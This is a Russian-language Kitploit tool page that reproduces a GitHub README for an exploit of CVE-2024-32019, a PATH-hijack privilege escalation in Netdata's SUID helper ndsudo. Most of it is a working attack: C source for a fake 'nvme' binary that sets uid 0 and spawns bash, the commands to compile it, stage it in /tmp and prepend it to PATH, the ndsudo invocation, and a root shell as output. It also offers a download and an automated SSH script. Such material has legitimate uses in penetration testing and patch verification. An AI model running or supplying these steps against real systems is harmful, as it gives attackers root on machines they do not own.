Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation — CVE-2024-32019 — это уязвимость локального повышения привилегий высокой степени серьезности в Netdata (версии >= 1.44.0-60 < 1.45.3), вызванная небезопасным использованием переменной PATH в SUID-бинарном файле ndsudo, что позволяет злоумышленникам выполнять произвольные команды от имени root. | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных ФайловЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2024-32019 — это уязвимость локального повышения привилегий высокой степени серьезности в Netdata (версии >= 1.44.0-60 < 1.45.3), вызванная небезопасным использованием переменной PATH в SUID-бинарном файле ndsudo, что позволяет злоумышленникам выполнять произвольные команды от имени root.

GitHub
dollarboysushil/cve-2024-32019-netdata-ndsudo-path-vulnerability-privilege-escalation

CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

РепозиторийСайт
14121 год назадЕщё не проверено
Поделиться

🚨 CVE-2024-32019 - Эксплойт уязвимости ndsudo Netdata в PATH (LPE до Root)

Эксплойт на Python для CVE-2024-32019, критической уязвимости локального повышения привилегий в Netdata Agent, использующей некорректно настроенный SUID-бинарник (ndsudo), который небезопасно обрабатывает переменную окружения PATH.


[!Caution] Этот код предназначен только для образовательных и авторизованных целей тестирования. Несанкционированное использование этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно.

🔍 Обзор

CVE ID: CVE-2024-32019
CVSS Score: 8.8 (High)
Дата раскрытия: 12 апреля 2024
Компонент: Netdata Agent
Затронутые версии:

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🧠 Техническое описание

Инструмент ndsudo Netdata — это SUID-бинарник root, предназначенный для безопасного выполнения ограниченного набора системных команд (например, nvme) от имени непривилегированных пользователей.

Однако из-за ошибки реализации он учитывает управляемую пользователем переменную PATH при разрешении двоичных файлов команд. Если злоумышленник может изменить PATH, включив в него каталог с возможностью записи, содержащий вредоносный бинарник, ndsudo выполнит его с привилегиями root — что приведет к локальному повышению привилегий.


💥 Шаги ручной эксплуатации

Следующие шаги демонстрируют, как вручную эксплуатировать уязвимость в ndsudo.

1. Создание бинарника для повышения привилегий

Сохраните следующий код C как nvme.c:

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

2. Компиляция эксплойта

root@kitploit:~
gcc nvme.c -o nvme

3. Подготовка среды эксплойта на цели

root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme

4. Изменение PATH

root@kitploit:~
export PATH=/tmp/fakebin:$PATH
which nvme
# Вывод: /tmp/fakebin/nvme

5. Запуск эксплойта

root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

В случае успеха вы получите root-оболочку.

root@kitploit:~
# whoami
root

Автоматическая эксплуатация

Если у вас есть доступ по SSH, вы можете использовать CVE-2024-32019-dbs.py для автоматизации процесса.

Эксплуатация с помощью скрипта

📎 Ссылки

  • Консультация GitHub по безопасности
  • CVSS Score: 8.8 (High)
  • CVE-2024-32019: анализ уязвимости Netdata и смягчение последствий
Скачать инструмент